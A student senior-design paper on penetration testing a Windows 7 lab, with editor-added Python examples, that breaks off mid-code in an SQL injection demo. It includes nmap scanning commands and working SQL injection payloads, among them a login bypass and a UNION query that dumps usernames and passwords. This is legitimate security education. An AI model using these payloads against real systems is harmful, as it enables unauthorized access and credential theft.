Pentesting Windows - Computer Science...


Page 1: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.

Pentesting Windows

Prepared by Chad Bartusick

In Partial Fulfillment of the requirements for Senior Design – CSC/CTC 492

Department of Computer Science
California State University, Dominguez Hills, Fall 2014

Committee Members/Approval

Faculty advisor: _____________________ Signature: ______________________ Date: _______________
Committee member: _____________________ Signature: ______________________ Date: _______________
Committee member: _____________________ Signature: ______________________ Date: _______________
Department Chair: Dr. Mohsen Beheshti Signature: ______________________ Date: _______________


Table of Contents

Approval sheet ........................................ 1
Table of Contents ..................................... 2
Abstract .............................................. 3
Introduction .......................................... 4
Chapter 1 – Background ................................ 5
Section 1.1 – What is penetration testing? ............ 6
Section 1.2 – Pre-Requisites .......................... 7
Chapter 2 – Planning and Preparation .................. 8
Section 2.1 – Directive approach ...................... 9
Section 2.2 – Prior Research and vulnerabilities ...... 10
Chapter 3 – Information Gathering and analysis ........ 11
Section 3.1 – Network Scanning ........................ 12-13
Section 3.2 – Webapp Scanning ......................... 14-15
Chapter 4 – Vulnerability Detection ................... 16
Section 4.1 – Host Vulnerability Scanning ............. 17-18
Section 4.2 – Webapp Vulnerability Scanning ........... 19-20
Section 4.3 – Manual detection ........................ 21-23
Chapter 5 – Penetration Attempt ....................... 24
Section 5.1 – Good ole Metasploit ..................... 25-26
Section 5.2 – Webapp penetration and Database dump .... 27-28
Chapter 6 – Covering Tracks and Persistence ........... 29
Section 6.1 – Keep calm…Clear the logs ................ 30
Section 6.2 – Botnets and Backdoors for Everyone! ..... 31
Conclusion ............................................ 32
Reference ............................................. 33
Appendix .............................................. 34-40


Abstract

In today's society, people do not fear intrusion on their computers because they place their trust in the security of the internet and in the antivirus protection loaded on their personal computer. Through this paper I will demonstrate how recklessly false this belief is and how shockingly easy it is to break into Windows 7 computers or servers through multiple points of entry. The purpose of this demonstration is to convey a message to those who are unaware of such potential threats, and it is intended for educational purposes. First, I demonstrate how quickly I am able to break in, and after that I will traverse some of the methodologies and processes professional penetration testers follow when penetrating networks or systems. The reason I am choosing Windows 7 is that in today's corporate world every company uses Windows 7 for some form of productivity. Linux, another computer operating system, is a major player as well, but as an entry point into a network I want to find the path of least resistance, and Linux tends to be a bit more robust and secure. In addition to penetrating Windows 7, I will showcase a new tool I am developing for enumerating user data once a system has been "rooted". This piece of Python code will gather system credentials and establish a simple botnet for later use. My goal is that the reader understands the serious concern over the lack of security in Windows 7, and that hackers trying to expand their knowledge of penetration testing gain a broader understanding of entry points. Hackers consumed by curiosity love to learn and possess personality characteristics of keen problem-solving skills and the ability to absorb and retain large amounts of seemingly meaningless detail. This information will be their greatest weapon. This research paper will give you the tools and knowledge to start conducting your own pentest.


Introduction

This paper will focus on the main aspects of pentesting Windows 7. Within the Windows 7 pentest, I will demonstrate the use of a collection of tools used to help facilitate the attack. A strong background in the OSI model and how TCP/IP works will help with the understanding of this paper. Windows is vulnerable in so many ways that I thought I would present you with a staple setup example. The example consists of a lab with Kali Linux as the attacking system; the victim system will be Windows 7 with a WAMP (Windows, Apache, MySQL, and PHP) stack. The victim will host a web app within WAMP called Mutillidae, which is a highly vulnerable webapp containing the OWASP (Open Web Application Security Project) Top 10 vulnerabilities. Mutillidae will help simulate a web server hosting a variety of services that the victim might be providing to customers. Since we are covering most aspects, I will show only introductory methods of pentesting. The sheer amount of knowledge of webapp exploitation alone would easily exceed this paper 100-fold. Some example attacks we will conduct are brute forcing credentials, man-in-the-middle attacks, sniffing credentials, SQL injection, cross-site scripting, stealing sessions, and exploiting a known service vulnerability.


1. Background

First, a little background about myself. I have 2 years of industry experience working as a security analyst. Most of my projects were security engineering driven. During my two years I wrote quite a bit of Python code and have utilized all the web languages. I contributed to pentesting of webapp environments and also network pentests.

The history of pentesting started in the 1960s when a timesharing system was compromised. That system was named AN/FSQ-32. It was at that point, after the break-in, that researchers and analysts decided to begin conducting studies on breaking into systems. The actual term "penetration test" was coined during a conference by a group of individuals from the RAND Corporation and the NSA. This group warned of future generations being attacked, as standard input and output was vulnerable to the malicious logic of humans writing hacking software.

Kali Linux, the attacking distribution, was born from the Debian Linux distribution. It was formerly known as BackTrack in the early 2000s. Kali is a collection of hacking tools. These tools are the Swiss army knife of penetration testing. These tools are on Linux because the sheer amount of flexibility on Linux overshadows Windows. The tools will be discussed more in depth throughout the paper.

Windows 7, the successor to Windows Vista, was released in 2009 and is the most widely used operating system on the planet. Over 1000 core developers worked on Windows 7 and it has above 32 million lines of code, which in turn means more vulnerabilities. A contributing factor as to why hackers target Windows is that almost every major corporation uses Windows 7 for productivity.


1.1 What is penetration testing?

For most of you reading, I will assume you have some knowledge of what penetration testing is. If not, penetration testing is the art and science of breaking into a computer system. The process consists of 5 major steps; each step gets you additional information about the system. Once the test is conducted, you gather your findings and compile an intricate report for the customer. The sole purpose of a penetration test is to find and collect vulnerabilities. It is up to the customer whether you go further and start to capitalize on their systems. That is highly unlikely, for most customers usually want a skim of the network for vulnerabilities or a web app scan. Penetration testers do not fix the actual vulnerabilities; instead they advise the customers and point them in a direction for remediation. Penetration testing can be conducted on Windows and Linux as well as Mac. There are three different types of penetration tests: white box, gray box, and black box. White box penetration testing is conducted with full knowledge of the company and its resources. You might even get access to their source code for some services or applications. With gray box testing, you learn moderate information about the company; however, the information you get may be very powerful. Black box testing consists of no knowledge at all about the company you are testing. It is the most realistic type of penetration testing, as it simulates outside attackers. I will be conducting a black box simulation, but obviously I know all the ins and outs, so technically this is a white box penetration test. Before I begin, I would like to share a couple of quotes on penetration testing that I abide by. The first is "Knowledge is power" (Francis Bacon). This I find true and very important for penetration testing. The second is "The quieter you are, the more you can hear" (Ram Dass), which means undetected surveillance is cumulative.


1.2 Pre-Requisites

What do you need to know for this paper and demonstration, you might ask? Well, you need to know a tad bit of Linux administration and some shell commands. You also need to know some Windows administration as well.

Learning penetration testing is quite obscure, forcing most, if not all, hackers to learn from other hackers. Pre-requisites are a bit misleading too, since a hacker's true motivation is to absorb and learn something new. Hackers are consumed with curiosity and love to learn. If you are passionate about becoming a full-time penetration tester, you need to possess this characteristic. I will give you some insight on what penetration testers should know or eventually learn, but for the sake of this paper you only need to know what I listed above.

Most professional penetration testers have a wide variety of skills. These skills include Windows administration, Linux administration, LDAP, Active Directory, the OSI model, TCP/IP, packet analysis, RADIUS client/server, TACACS, Python or Perl, PHP, MySQL, Oracle, CMSs, and some knowledge about Samba. This list can extend even further as you get more directed toward embedded systems such as routers and wireless hacking. For the most part, a good chunk of what our skill requires is in that list. Penetration testers often pick very specific paths; some may even choose to do reverse engineering of malware, or engineering of malware for penetration purposes. The material above is accessible from books sold to the public and can be purchased at Amazon or Barnes and Noble. Knowledge does in fact hold a lot of power. You realize this power by knowing MySQL queries; for example, you can indeed dump out table data or inject data into a table. Make learning a passion and give it drive through pursuing security!


2. Preparation and planning

The very first step is to get your reporting and documentation organized and ready for what we are about to find. You may use any tool of your choice, but I personally use the VIM text editor for everything, including programming. I have witnessed others using Microsoft Word. There is a neat tool for both Windows and Linux called Dradis. It is a very exotic tool that collects data from Nmap and from user input as well. This tool organizes everything for you and can export all the data to most file types. This comes in handy when you are testing a very large subnet or multiple subnets. When documenting your findings, you need to take as many screenshots as you can. Once you have some screenshots, you must write descriptions. The screenshots must be POC (proof of concept). Screenshots must essentially tell a story and show what data was extracted or exploited. For the most part, the customer does not want solely text, as text can be rather boring. List all your IPs according to their subnets, and list all the credentials in order of their services as well. When documenting an individual host with its vulnerabilities, you need to put the highest priority vulnerability at the top and color code each one in descending order, such as red, then orange, then green.

When conducting the test, you need to have your environment set up. This includes a laptop with Kali Linux or your favorite distribution, a couple of flash cards, and a wireless dongle with an attachable antenna. You should have all your tools installed if you wish to use Kali. For those who are not using Kali, I will explain each tool I am using. If you are a freelance penetration tester, it is essential to conduct business in a legal and professional manner. If you are working internally, you should have written authority for the test. The legal documents will contain an NDA (non-disclosure agreement) outlining what is "off limits" for you to touch in the company's systems.


2.1 Directive Approach

The directive approach is ideal if you can afford it. It consists of a team of penetration testers. For this type of approach, the team has split operations for testing, which can be highly effective, yielding the results needed in a short amount of time. Usually, pairs of testers are assigned to each process of the penetration testing process. For example, two testers will scan and do reconnaissance, and from there they will connect to Dradis, which centralizes the findings. Two other testers would start the vulnerability scans once the first team has found some additional hosts. Another team of two would then begin exploitation from the findings of the vulnerability scanning team. The last team of two would be post-exploitation and persistence. The structure is cascading and frees us of time constraints for each individual group and tester. If there are any false positives within a group, there are more findings from the prior team still flowing into the Dradis database. Again, Dradis is optional; you can use any centralized tool you like. I participated on the defending side of this type of approach during the WRCCDC (Western Region Collegiate Cyber Defense Competition): you see waves of scans at first, then in a matter of minutes you start to see odd and unusual things happen on your machines, which gave our team little time to defend.

The directive approach is maintained by a captain who organizes the entire thing. The captain will oversee each area and decide if there is a vector on which he wants to focus more. This approach is also ideal for when certain members lack skill in a certain area but excel in another. This gives the team a focal point for their prowess. The team can also be remote and log in to attack, if the legal documents permit that action. This gives the team greater flexibility.


2.2 Prior Research and Vulnerabilities

If you do not know what vulnerabilities are, I will explain. Vulnerabilities are bugs and faults within the code that arise from a variety of things. These vulnerabilities, whether input that is not limited by length or limits on SQL statements, can be used to generate an exploit. The exploit is written to do one thing, and that is exploiting the target system. There is code engineered within the exploit to help facilitate the exploitation. The exploit can be written in a multitude of languages. From there, we develop a payload, which launches the attack and contains the malicious code to execute. Usually the payload is a reverse shell, which we will discuss later.

Researching prior vulnerabilities is a great way to get ahead of the game when pentesting. If you are going to attack a company or a single party and you know what services they are renowned for, it would be to your advantage to find the vulnerabilities that exist for those services. These vulnerabilities may be listed on the black market, or, if you are late, the company will have a patch notes area where they will be listed with a time stamp. One thing that may be helpful is to find a pattern with existing services. If they tend to have a lot of custom services, you may want to scan the upper region of the port numbers beyond the well-known ports (1-1024).

Vulnerabilities exist for a short time after what is called ZERO day, which is the day the exploits are discovered. There is a limited amount of time to use that exploit on a target system before it is patched. An easy but very useful site to use is http://exploit-db.com. This site contains a list of up-to-date exploits that are ready to use on day zero and within the weeks that follow on existing systems. Zero day is a very happy time for pentesters.


3. Information Gathering and Analysis

We begin our journey with the first step, "Information Gathering", also called reconnaissance. Since there are a total of five steps listed in some sources, I am going to combine reconnaissance with scanning.

I will start off with a proper definition of reconnaissance. It is as follows: "The first and most important step in an attack involves finding out as much information as possible about the TOE (Target of Evaluation). If a passive information gathering approach is taken it will not raise any alarms. Patience and creativity are also a necessity as this can be the longest phase of the attack." (DeFino 6).

The proper definition of scanning and reconnaissance from the book "Official Certified Ethical Hacker Review Guide" by Steven DeFino states that "The goal of scanning is to learn as much technical data about the systems as possible. Live hosts are found and the network is footprinted. The access points on each live host are determined. Finally, the services that are available are confirmed and the operating systems of each platform are verified. Policies and user information is gathered and, finally, vulnerabilities are assessed." (DeFino et al 6).

One thing to mention from past experience: even though the first phase may be the longest, it certainly can be the fastest if you hit the target at the right time and gather what you need for easy access. However, most of the time it is the longest phase. There are two more vulnerability databases I need to mention, and those are http://cve.mitre.org and http://osvdb.org. Both of these are the most prominent vulnerability databases around.


3.1 Network Scanning

A small and easy discovery tool for passive reconnaissance is "Discover-Scripts". These scripts will literally fetch and retrieve most of the passive reconnaissance items. It will save you loads of time that you can spend discovering other easy-to-obtain items. "The Hacker Playbook" by Peter Kim states, "This tool automates a lot of different searches in one tool. For example, it can search people within that organization or domains on all the common harvesting sites (e.g. LinkedIn), use common domain tools (e.g. goofile, goog-mail, theHarvester, search_email_collector, mydnstools) and link 3rd party tools to perform additional searching." (Kim 21)

After briefly going over reconnaissance, I want to move on to scanning. Nmap (Network Mapper) is the most popular tool for actively scanning networks. "Nmap Network Scanning" by Gordon Fyodor Lyon states, "Nmap ("Network Mapper") is a free and open source utility for network exploration and security auditing." (Lyon xxi). Extending this description, he says, "Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) are running, and what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts." (Lyon xxi).

The use of Nmap is trivial; I will list some commands and a short description of each. This is where we actively start when pentesting a host or a large network: finding points of interest on a single host or across large networks.


Try a ping sweep (current Nmap releases spell this option -sn; -sP is still accepted as the older name).
nmap -sP -v [target range]

Try a list scan.
nmap -sL -v [target range]

Try a protocol scan.
nmap -sO -v [target IP]

Try to verify services.
nmap -sV -v [target IP]

Try a normal connect scan.
nmap -sT -v [target IP]

Try a stealth scan.
nmap -sS -v [target IP]

Try an inverse scan: Xmas.
nmap -sX -v [target IP]

Try an inverse scan: NULL.
nmap -sN -v [target IP] (DeFino et al 58)

Note that the command is lowercase nmap on Linux, and the raw-packet scans (-sO, -sS, -sX, -sN) need root privileges; the connect scan (-sT) does not.

These findings should be filed and sorted for the next and upcoming phases of the attack. I am assuming you already have knowledge of networking and standard TCP/IP.
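To file and sort the results of those scans for the later phases, here is an added example (mine, not code from the paper or from the Nmap project) that parses Nmap's grepable output format, written with -oG, into open ports grouped per host and ordered by address and port. The scan text embedded in it is a constructed sample standing in for a real -oG file; its addresses and version strings are invented.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample of Nmap grepable (-oG) output; not a real scan result.
# Fields on a "Host:" line are tab-separated "Key: value" pairs, and each
# entry in the Ports field is port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = """\
# Nmap 6.47 scan initiated (constructed sample)
Host: 192.168.56.102 ()\tStatus: Up
Host: 192.168.56.102 ()\tPorts: 3306/open/tcp//mysql//MySQL 5.6.17/, 80/open/tcp//http//Apache httpd 2.4.9/\tIgnored State: closed (998)
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows 7 microsoft-ds/, 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)
# Nmap done (constructed sample)
"""


@dataclass(frozen=True)
class Finding:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_gnmap(text):
    """Parse grepable output into one Finding per port entry (any state)."""
    findings = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # "192.168.56.101 ()" -> address only
        if "Ports" not in fields:
            continue  # "Status: Up" lines carry no port data
        for entry in fields["Ports"].split(", "):
            parts = entry.split("/")
            findings.append(Finding(host, int(parts[0]), parts[2], parts[1],
                                    parts[4], parts[6]))
    return findings


def open_ports_by_host(findings):
    """Keep only open ports, grouped per host and sorted by address then port."""
    by_host = {}
    for f in findings:
        if f.state == "open":
            by_host.setdefault(f.host, []).append(f)
    return {host: sorted(by_host[host], key=lambda f: f.port)
            for host in sorted(by_host, key=ipaddress.ip_address)}


def report(text):
    """Render the grouped findings as plain lines ready for the notes or report."""
    lines = []
    for host, items in open_ports_by_host(parse_gnmap(text)).items():
        lines.append(host)
        for f in items:
            lines.append(f"  {f.port}/{f.proto} {f.service} {f.version}".rstrip())
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_GNMAP)))
```

Run it against a saved scan with parse_gnmap(open("scan.gnmap").read()). The filtered port in the sample survives parse_gnmap but is left out of the per-host summary, which is the distinction the vulnerability-scanning phase cares about.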


3.2 Webapp Scanning

Webapp scanning is essentially web page spidering. The Web Hacker's Handbook 2 states, "Various tools can perform automated spidering of websites. These tools can work by requesting a webpage, parsing it for links to other content, requesting these links and continuing recursively until no new content is discovered." (Stuttard et al 74). Spidering is essential to the discovery of attack vectors. Burp Suite is a great tool to use when mapping a website. The Hacker Playbook states, "To spider your application, drop into the target tab, site map tab, right click on the domain you want to spider, and click "Spider this host". Once the spidering process is complete, Burp should have a good layout of exactly what the application looks like." (Kim 49).

[Figure 19 – Burp Suite Site Map, taken from The Hacker Playbook]

Some files and folders might not be listed in the spider listing. You may navigate to these manually if you know them offhand, or you can right click the site map, click "Engagement tools", and finally click "Discover Content". If the site has authentication on it, Burp may be configured to use HTTP basic auth, HTTP digest authentication, and form-based authentication. The Web Hacker's Handbook gives us a great tip for finding hidden content. "Many web servers contain a file named robots.txt in the web root that contains a list of URLs that the site does not want web spiders to visit or search engines to index. Sometimes, this file contains references to sensitive functionality, which you are certainly interested in spidering. Some spidering tools designed for attacking web applications check the robots.txt file and use all URLs within it as seeds in the spidering process. In this case, the robots.txt file may be counterproductive to the security of the web application." (Stuttard et al 74). This robots.txt is listed at the top domain path, e.g. www.example.com/robots.txt.
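The recursive spidering loop Stuttard describes and the use of robots.txt entries as seeds can be shown together in a few lines. The following is an added example, not code from the paper, from Burp Suite or from the Handbook: a breadth-first spider over a constructed in-memory site (the hostname victim.example and every page in it are invented) that parses each page for links, follows only same-host ones, and reports which paths became reachable solely because robots.txt listed them, which is exactly the "counterproductive" case the quote warns about and the thing to check in your own robots.txt.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed in-memory site standing in for a real web server (not a real target).
BASE = "http://victim.example/"
SITE = {
    "/": '<a href="/about.php">About</a> <a href="/login.php">Login</a> '
         '<a href="http://other.example/x">ext</a>',
    "/about.php": '<a href="/">Home</a> <img src="/img/logo.png">',
    "/login.php": '<form action="/login.php"><input name="user"></form>',
    "/img/logo.png": "",
    "/robots.txt": "User-agent: *\nDisallow: /admin/\nDisallow: /backup/db.sql\n",
    "/admin/": '<a href="/admin/users.php">Users</a>',
    "/admin/users.php": "",
    "/backup/db.sql": "",
}


def fetch(url):
    """Stand-in for an HTTP GET against the in-memory site; None means 404."""
    return SITE.get(urlsplit(url).path)


class LinkExtractor(HTMLParser):
    """Collect href/src/action attribute values from a page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.links.append(value)


def extract_links(page_url, body):
    """Resolve every link relative to the page and keep only same-host ones."""
    parser = LinkExtractor()
    parser.feed(body)
    host = urlsplit(page_url).netloc
    return [absolute for absolute in (urljoin(page_url, l) for l in parser.links)
            if urlsplit(absolute).netloc == host]


def robots_seeds(base_url):
    """Turn each Disallow entry in robots.txt into a seed URL for the spider."""
    body = fetch(urljoin(base_url, "/robots.txt"))
    if body is None:
        return []
    seeds = []
    for line in body.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            seeds.append(urljoin(base_url, value.strip()))
    return seeds


def spider(base_url, use_robots=True):
    """Breadth-first crawl: fetch, parse for links, enqueue unseen ones, stop when none remain."""
    queue = [base_url] + (robots_seeds(base_url) if use_robots else [])
    seen, found = set(), set()
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        body = fetch(url)
        if body is None:
            continue
        found.add(urlsplit(url).path)
        queue.extend(link for link in extract_links(url, body) if link not in seen)
    return found


def robots_only_paths(base_url):
    """Paths discovered only because robots.txt pointed at them."""
    return spider(base_url, use_robots=True) - spider(base_url, use_robots=False)


if __name__ == "__main__":
    print("spidered:", sorted(spider(BASE)))
    print("reachable only via robots.txt:", sorted(robots_only_paths(BASE)))
```

Replacing fetch with a real HTTP client is the only change needed to point this at a live host; the same-host filter is what stops the crawl from wandering off into off-site links, which the Handbook lists separately as peripheral behaviour to note rather than follow.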

Once you have a general map of the site, you should have a list of good attack vectors. Some things you will be looking for are listed by The Web Hacker's Handbook 2:

- The core security mechanisms and how they function – in particular, management of session state, access controls, and authentication mechanisms and supporting logic (user registration, password change, and account recovery)
- All different locations at which the application processes user-supplied input – every URL, query string parameter, item of POST data, and cookie
- The technologies employed on the server side, including static and dynamic pages, the types of request parameters employed, the use of SSL, web server software, interaction with databases, email systems, and other back-end components
- Other, more peripheral application behavior, including off-site links, error messages, administrative and login functions, and the use of redirects

(Stuttard et al 98)

In detail, these items would be quite a bit to cover. These are the items to look for when spidering. Take note of the locations and what default value or key pair is listed. Knowing the server-side software is very important as well.


4 Vulnerability Detection

After you have gathered your list of IP addresses and subnets containing possibly vulnerable services, you may also have a site map of a possibly badly developed web app that you spidered from an Apache server running on a Windows 7 host. The next step is to probe and test these vectors of attack. The following diagram shows the ratio of web vulnerabilities.

[Figure 5 – Webapp vulnerability ratio, from Whitehatsec.com]

During the years of the early 2000s, this was the ratio of software vulnerabilities. Although the statistics have not greatly changed since then, we will not be getting into the actual finding of vulnerabilities in software, and instead the enumeration of existing ones.

[Figure 1 – Software vulnerability ratio, from research.microsoft.com]


4.1 Host Vulnerability Scanning

From the list of IP addresses, you can now start your vulnerability scanner and scan single targets or a range of targets from a subnet. When it comes down to which vulnerability scanner to use, you have three choices. The first choice, OpenVAS, is my personal favorite. OpenVAS is a free, community-driven scanner that is updated from the community and by the community. The setup is rather long and very complex, and I must mention the setup can sometimes break. The next option is the Nessus vulnerability scanner. Nessus is also free, but without up-to-date plugins. Plugins in a vulnerability scanner are the mini-programs that facilitate the detection of a vulnerability. Not having an up-to-date plugin database will be your downfall. By the way, Nessus charges $1,500 for a single license. Nexpose is the last option, and it is similar to Nessus in that it limits the features and plugins as well. They also begin charging around $2,000 for the license. You can see why I prefer OpenVAS to any other scanner. OpenVAS is usually already installed on Kali Linux as well. They have made the setup seemingly easy, from what I have heard. For the sake of simplicity I will explain Nessus and Nexpose, since they are both used in commercial environments. The Hacker Playbook explains, "If time is a large concern, I'll actually run a profile first to look for only known exploitable vulnerabilities and a second scan with the default profile. This way, the first scan will complete in a fraction of the time and contain only critical findings." (Kim 35). The GUIs do not need any explaining, as they are all labeled and are pretty straightforward. You input the IP address or subnet, select additional options for the attack, and then launch it. Some of the scanners do not have a progress bar, so be patient. Interrupting the process can sometimes break the software. Below, the first image is Nexpose and the second image is Nessus.


[Figure 8 – Nexpose, from The Hackers Handbook]

[Figure 9 – Nessus, from The Hackers Handbook]

These vulnerabilities will be listed with multiple ID numbers attached to them. For example, some might have CVE, OSVDB, BID, or VUPEN IDs. These are IDs into vulnerability databases.


4.2 Webapp Vulnerability Detection

After you have spidered the webapp you can now use the Burp Suite to also probe for vulnerabilities. My other favorite tools for probing for webapp vulnerabilities are OWASP ZAP and w3af. We will talk about the Burp Suite active scanner. The Hacker Playbook states, "Once you feel comfortable that you have identified an adequate portion of the site, you can start attacking the parameters, requests, and looking for vulnerabilities." (Kim 52). Kim explains, "This can be done by right clicking on the parent domain and dropping down to 'Actively scan this host' (Image below)." (Kim 53)

BURP SITE MAP

Figure 23 – from The Hacker Play Book

Once the scanner has finished running you will have a listing of potential vulnerabilities in your webapp. The reason we also spidered it first was to give the scanner an FQDN to speed up the process; otherwise it will scan the entire site, which might take quite a bit of time. The results will be on the left-hand side in a vertical list. Upon clicking one of the pages, you will see a list of vulnerabilities associated with that page. You can then click on each one and evaluate whether it is a false positive or not. For example, Burp Suite found an XSS vulnerability in the image below.


BURP SCANNER

Figure 24 - from The Hacker Play Book

To verify this is not a false positive, we click the XSS vulnerability and copy and paste the URL with the exact parameters. Once we navigate to that page we find that the XSS exists: there is a JavaScript alert window with the number 1, or any other value we specified within the alert from the attack. This is just one example of the many vulnerability detections on webapps. What is really neat with OWASP ZAP is that it will do all these things at once if you just put in the IP address of the site along with the port number, although it tends to get rather slow because of the massive amounts of data going back and forth. One of the first bug hunting books I read as a child was "Hunting Security Bugs" by Tom Gallagher et al. In the book they explain the following about finding webapp bugs: "Use a fuzzer. Fuzzing is sometimes dismissed because its goal is to send random junk to the component being tested. People often think that this won't yield great results and that targeted testing will cover these cases. Surprisingly, fuzzing can find bugs that aren't discovered through code review and targeted testing." (Gallagher 72). Fuzzing is a technique in which a tool feeds random characters and numbers into an input field in the hope that the webapp or application will fault and crash. A crash signifies a bug and a potential vulnerability.
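As an added illustration of the fuzzing quote above (example code written for this edit, not from the paper or from Gallagher's book), here is a minimal mutation fuzzer run against a constructed toy query-string parser. The parser and its deliberate defects, the seed inputs, the mutation alphabet and the hardened version built on `urllib.parse.parse_qsl` are all assumptions made for the example; the point is that a seeded, reproducible fuzz run finds the crash and a fixed parser survives the same run.

```python
"""Added example, not from the paper: a minimal mutation fuzzer.

It demonstrates the Gallagher quote above: random junk fed into an input
parser finds crashes that targeted tests miss.  `parse_query_string` is a
constructed toy parser with deliberate defects; the hardened version
delegates to the standard library.
"""
import random
import string
from urllib.parse import parse_qsl


def parse_query_string(qs):
    """Constructed toy parser turning 'a=1&b=2' into {'a': '1', 'b': '2'}.

    Deliberate defects (the kind fuzzing is good at finding):
      * a pair with no '=' makes parts[1] raise IndexError
      * a '%' not followed by two hex digits makes int() raise ValueError
    """
    result = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        parts = pair.split("=", 1)
        key, value = parts[0], parts[1]          # IndexError on "key" with no '='
        decoded = ""
        i = 0
        while i < len(value):
            if value[i] == "%":
                decoded += chr(int(value[i + 1:i + 3], 16))  # ValueError on "%zz" or trailing "%"
                i += 3
            else:
                decoded += value[i]
                i += 1
        result[key] = decoded
    return result


def parse_query_string_hardened(qs):
    """Hardened replacement: parse_qsl tolerates a missing '=' and bad escapes."""
    return dict(parse_qsl(qs, keep_blank_values=True))


SEEDS = ["user=test&pass=test", "id=1", "q=hello%20world"]       # constructed seed corpus
ALPHABET = string.ascii_letters + string.digits + "&=%+'\";<>-"   # characters a parser cares about


def mutate(sample, rng):
    """Apply one random mutation: insert, delete or replace a single character."""
    op = rng.choice(("insert", "delete", "replace"))
    ch = rng.choice(ALPHABET)
    if op == "insert" or not sample:
        pos = rng.randrange(len(sample) + 1)
        return sample[:pos] + ch + sample[pos:]
    pos = rng.randrange(len(sample))
    if op == "delete":
        return sample[:pos] + sample[pos + 1:]
    return sample[:pos] + ch + sample[pos + 1:]


def fuzz(target, seeds, iterations=2000, seed=1):
    """Run `target` on mutated seeds; return (input, exception name) for every crash.

    The RNG is seeded so a run is reproducible, which matters when you want
    to hand a crashing input to the developer who owns the parser.
    """
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        sample = rng.choice(seeds)
        for _ in range(rng.randint(1, 4)):
            sample = mutate(sample, rng)
        try:
            target(sample)
        except Exception as exc:           # any uncaught exception is a finding
            crashes.append((sample, type(exc).__name__))
    return crashes


if __name__ == "__main__":
    for inp, err in fuzz(parse_query_string, SEEDS)[:5]:
        print(f"{err}: {inp!r}")
    print("hardened parser crashes:", len(fuzz(parse_query_string_hardened, SEEDS)))
```

Running it prints a handful of crashing inputs for the toy parser (missing `=` and malformed `%` escapes) and zero for the hardened one; the same loop works against any function that takes a string, which is how one would wrap a form handler or an API deserializer under test.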


4.3 Manual Detection

Once we have found some hosts and mapped some services to those hosts, if we are lucky we will find some web servers, namely Apache, IIS, or Tomcat. These web servers may be mapped if they are hosting dynamic web content. This dynamic web content could potentially be hosting vulnerable elements, SQL statements, and so on. OWASP ZAP, Burp Suite and w3af are some of the best all-in-one tools for webapp scanning and exploitation. SQL injection can happen on webapp input such as forms or in POST and GET requests. I'm going to focus on the manual findings on the webapp side. The first major OWASP vulnerability usually found in webapps is SQL injection. "Professional Penetration Testing" by Thomas Wilhelm says, "According to NIST Special Publication 800-95, SQL injection is a 'technique used for manipulating Web services that send SQL queries to a RDBMS [relational database management system] to alter, insert, or delete data in a database'" (Wilhelm 326). To get everyone acquainted with some vulnerabilities in SQL queries Wilhelm gives us the example,

SELECT * FROM user_data WHERE last_name = 'Tom'

(Wilhelm 326)

The next example is what we can additionally add on to the query to make it pass back everything in the database.

SELECT * FROM user_data WHERE last_name = 'Tom' OR '1' = '1'

(Wilhelm 326)

Since we added the logical OR operator, whether the last name matched or not it would still return everything. The one thing missing from the end of his example is "-- -", which tells MySQL to treat the rest of the line as a comment after the dashes, so essentially you tell it not to process anything after that. To put this into a scenario I will explain bypassing a login. The scenario goes as follows: you find out that by placing a "'" into the input field of a login form, it displays an error because the developers didn't escape known SQL characters. The error displays the current table and columns. The Web Application Hacker's Handbook 2, by Dafydd Stuttard et al., gives us this example

SELECT * FROM users WHERE username = 'marcus' and password = 'secret'

(Stuttard et al. 289)

Stuttard states, "For example, if an attacker knows that the username of the application administrator is admin, he can log in as that user by supplying any password and the following username: admin'--" (Stuttard et al. 289).

SELECT * FROM users WHERE username = 'admin'--' AND password = 'foo'

(Stuttard et al. 289)

This essentially turns the query into

SELECT * FROM users WHERE username = 'admin'

(Stuttard et al. 289)

The last example is manual extraction of data. From this we have the basics of bypassing and extracting data. For example, if we add a single apostrophe into a form field we get an error. Chances are the error might list the table name. From there we can construct our UNION statement to extract the records from the current table or other tables with the same data types, but take note this only works for a matched number of fields. In order to find out how many fields there are and each field's respective data type, we can methodically guess by incrementing the number of NULL values in the UNION statement until the query passes with no error message. NULL is compatible with "any" data type.

' UNION SELECT null,null,null,null,null -- -


Since my demonstration has 5 fields we will use that as an example. After we find out that the table has five respective fields we can start guessing the data types or extracting current table data.

' UNION SELECT null,Username,Password,null,null FROM accounts -- -

This will dump out the usernames and passwords from the accounts table. Keep in mind the statement before the single apostrophe with which we abruptly ended it was:

SELECT * FROM accounts WHERE username='
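To make the login bypass, the tautology and the NULL-counting probe concrete, here is an added example (written for this edit, not from the paper or from the books it quotes) that runs them against an in-memory SQLite database through Python's sqlite3 module, next to the parameterized query that defeats them. The five-column `accounts` table, its sample rows and the function names are constructed for the example; SQLite's `--` comment and its UNION column-count error behave the way the text describes for MySQL.

```python
"""Added example, not from the paper or the books it quotes: the login
bypass, the tautology and the UNION NULL-count probe from this section run
against an in-memory SQLite database, next to the parameterized query that
stops them.  Table and column names follow the text; rows are constructed.
"""
import sqlite3


def make_db():
    """Constructed sample database: the five-column accounts table the text assumes."""
    con = sqlite3.connect(":memory:")
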